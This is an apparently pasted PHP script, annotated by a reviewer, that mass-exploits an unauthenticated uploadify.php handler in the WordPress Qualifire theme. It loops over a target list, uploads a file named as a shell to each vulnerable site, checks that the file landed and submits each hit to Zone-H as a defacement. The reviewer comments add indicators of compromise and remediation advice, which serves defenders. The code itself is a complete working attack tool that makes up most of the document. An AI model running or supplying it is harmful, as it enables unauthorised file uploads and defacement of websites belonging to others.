choirurrizal

Mass WordPress Qualifire + Zone-H

Mar 27th, 2018 (edited)
  1. <?php
  2. /*
  3. coded by ShinChan - N45HT | 04/03/2018
  4. */
      /*
       * Reviewer summary (annotations only; the code itself is unchanged).
       *
       * For every entry in a list file this script (1) requests the uploadify.php
       * handler located inside the Qualifire WordPress theme directory, (2) on
       * HTTP 200 POSTs a local file to it as the form field "Filedata", (3) looks
       * for that file name directly under the site root, and (4) submits the
       * resulting URL to Zone-H's defacement-notification form.
       *
       * Indicators a site owner can search for, all taken from the values below:
       *   - requests to /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php,
       *     here a GET followed by a POST from the same client;
       *   - an unexpected file named indo.jpg directly under the web root;
       *   - the handle "N45HT" next to the site's domain in defacement archives.
       *
       * No cookies, credentials or nonce are sent anywhere in the script, so it
       * relies on the handler accepting uploads from unauthenticated clients.
       * Removing the bundled upload handler, or denying web access to it, closes
       * that path.
       */
  5. echo "
  6. ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
  7. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
  8. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
  9. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
  10.      WordPress Qualifire + Zone-H - coded by ShinChan
  11.  
  12. ";
      // The name typed at this prompt is overwritten two statements later;
      // the list is always read from qualifire.txt.
  13. echo "Input your target list: ";
  14. $list = trim(fgets(STDIN));
  15.  
      // Fixed values used for the rest of the run: list file, local file to send,
      // Zone-H handle, the theme's upload handler path, and the directory (site
      // root) where the script later looks for the uploaded file.
  16. $list = "qualifire.txt";
  17. $shell = "indo.jpg";
  18. $nickzoneh = "N45HT";
  19. $exploit = "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php";
  20. $path = "/";
  21.  
      // Reads the whole list file in one call and splits it on "\r\n".
      // The fopen()/filesize() results are not checked and the handle is not closed.
  22. $open = fopen("$list","r");
  23. $size = filesize("$list");
  24. $read = fread($open,$size);
  25. $lists = explode("\r\n",$read);
  26.  
  27. echo "\n";
  28.  
  29. foreach($lists as $target){
          // Entries without an http:// or https:// prefix get http:// prepended.
  30.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  31.         $targets = "http://$target";
  32.     }else{
  33.         $targets = $target;
  34.     }
  35.    
  36.     echo "Target => $targets\n";
  37.     echo "  [*] Checking Path : ";
  38.  
          // Probe: a plain GET to the handler path, following redirects. Only the
          // final status code is used; the response body is discarded.
          // No CURLOPT_USERAGENT is set, so these requests presumably arrive without
          // a User-Agent header -- a possible log filter, confirm against real traffic.
  39.     $cd = curl_init("$targets$exploit");
  40.     curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
  41.     curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
  42.     curl_exec($cd);
  43.     $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
  44.     curl_close($cd);
  45.    
          // Any 200 after redirects is treated as "handler present", so a host that
          // answers 200 for every path also passes this check.
  46.     if($httpcode == 200){
  47.         echo "200 OK\n";
  48.         echo "  [*] Uploading shell : ";
              // Upload attempt: POST to the same handler with one field, "Filedata".
              // The "@" prefix is PHP cURL's legacy notation for attaching a local file.
              // This handle ($ch) is never closed.
  49.         $ch = curl_init();
  50.         curl_setopt($ch, CURLOPT_URL, "$targets$exploit");
  51.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  52.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  53.         curl_setopt($ch, CURLOPT_POST, 1);
  54.         curl_setopt($ch, CURLOPT_POSTFIELDS, array("Filedata"=>"@$shell"));
  55.         $post = curl_exec($ch);
  56.        
              // Follow-up GET for <site>/indo.jpg; body goes to $ceek, status to $ceeks.
              // This handle ($cek) is never closed either.
  57.         $cek = curl_init();
  58.         curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
  59.         curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
  60.         curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
  61.         $ceek = curl_exec($cek);
  62.         $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
  63.        
              // Success is declared when the upload response compares loosely equal to 1
              // OR the follow-up GET returned 200. Either test alone is weak evidence:
              // an "OK" line here, and the Zone-H report that follows, does not prove a
              // file was written. Check the web root on disk before treating a listed
              // host as compromised.
  64.         if($post == 1 or $ceeks == 200){
  65.         //if(preg_match("/hacked/",$ceek)){
  66.             echo "OK $targets$path$shell\n";
  67.             echo "  [*] Zone-H : ";
                  // Submits the URL to Zone-H's single-notification form over plain HTTP.
                  // Fields sent: defacer (the handle above), domain1 (the file URL),
                  // hackmode and reason; what the numeric codes mean is not visible here.
  68.             $zh = curl_init("http://zone-h.org/notify/single");
  69.             curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
  70.             curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
  71.             curl_setopt($zh, CURLOPT_POST, 1);
  72.             curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
  73.  
                  // The submission counts as accepted when the response HTML contains
                  // a red "OK" list item (case-insensitive match).
  74.             $postzh = curl_exec($zh);
  75.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
  76.                 echo "OK\n\n";
  77.             }else{
  78.                 echo "NO\n\n";
  79.             }
  80.         }else{
  81.             echo "Failed\n\n";
  82.         }
  83.     }else{
              // Printed for every status other than 200, including connection failures
              // (curl reports status 0 when no response was received).
  84.         echo "Not Vulnerable\n\n";
  85.     }
  86.  
  87.     }